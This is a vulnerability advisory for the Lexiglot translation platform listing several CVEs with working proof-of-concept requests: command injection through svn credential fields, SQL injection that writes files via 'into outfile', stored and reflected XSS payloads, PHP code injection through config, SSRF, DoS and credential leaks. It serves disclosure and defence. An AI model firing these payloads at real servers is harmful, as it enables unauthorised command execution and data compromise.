JAHx181 - Piwigo lexiglot multiple vulnerabilities
This advisory somehow slipped between the cracks, but hey, 4 years late is better than never...right?
About
Lexiglot is a translation platform for PHP projects developed in PHP. -- http://piwigo.org/translate
Command injection
CVE-2014-8945
The username and password fields are vulnerable to command injection when adding a new project.
POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1
name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add
HTTP/1.1 200 OK
string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
SQL Injection
CVE-2014-8941
There are several SQL injection vulnerabilties in the project.
~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'
POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D;
ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=jqnd14cvtvddkf99t8d18ikr17
user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search
Cross site request forgery
CVE-2014-8942
The identified SQL injection can be exploited through CSRF
Server side request forgery
CVE-2014-8943
The add a project page will request urls provided for a svn repository to ensure its a valid svn repository, an attacker can abuse this to make the server make requests on behalf of the attacker.
POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1
name=test&svn_url=http%3A%2F%2Fhost%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add
HTTP/1.1 200 OK
string(132) "svn: OPTIONS of 'http://host:8888': Could not read
status line: connection was closed by server
(http://host:8888)"
Cross site scripting
CVE-2014-8944
There are both persistent and reflected xss in this project:
Reflected: Login with username a"><script>alert(1)</script>
Persistent: Through configuration interface, the install_name, intro_message and new_file_content parameters:
POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
Host: 192.168.58.134
Proxy-Connection: keep-alive
Content-Length: 435
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.134
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie:
lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D;
ck_login_id_20=1; ck_login_language_20=en_us;
PHPSESSID=v97mnbctl9hlkc0564cgu7r034
X-FirePHP: 0.4.4
X-FirePHP-Version: 0.4.4
X-Wf-Max-Combined-Size: 262144
install_name=Lexiglot<script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21<script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save
Denial of service
CVE-2014-8937
The api/update.php url is publicly accessible and will run svn update on all registered projects which consumes significant resources and ties up a web server thread. Multiple similtaneous requests to this url will cause resource exhaustion and render the web server inaccessible.
Local credential disclosure
CVE-2014-8938
The svn update function executes with username and password as command line arguments. In shared environments other users may be able to obtain these credentials by running the ps command:
~# ps auxw | grep svn
www-data 27662 0.0 0.4 12792 3548 ? S 20:17 0:00 svn checkout http://host:8888/ ./local/test --revision HEAD --username test --password test
Local path disclosure
CVE-2014-8939
Local path is disclosed by the following urls if php is configured to display warnings: include/smarty/plugins/modifier.date_format.php
Information disclosure
CVE-2014-8940
An attacker can access the /update.log url to view all the projects that have been updated, this can be used to leverage the aforementioned DoS attack or to browse repository code as the projects are checked out to /local/projectname
. Example:
~# GET
http://localhost/vvv/lexiglot/update.log | head -1
[2014-11-08T11:58:10+01:00] rotateimage
~# GET
http://localhost/vvv/lexiglot/local/rotateimage | head -10
<title>Index of /vvv/lexiglot/local/rotateimage</title>
<img src="/icons/folder.gif" alt="[DIR]"> <a href="ar_SA/">ar_SA/</a>
Solution
Upgrade to the latest version or seek an alternative as the vendor deemed some of these issue acceptable.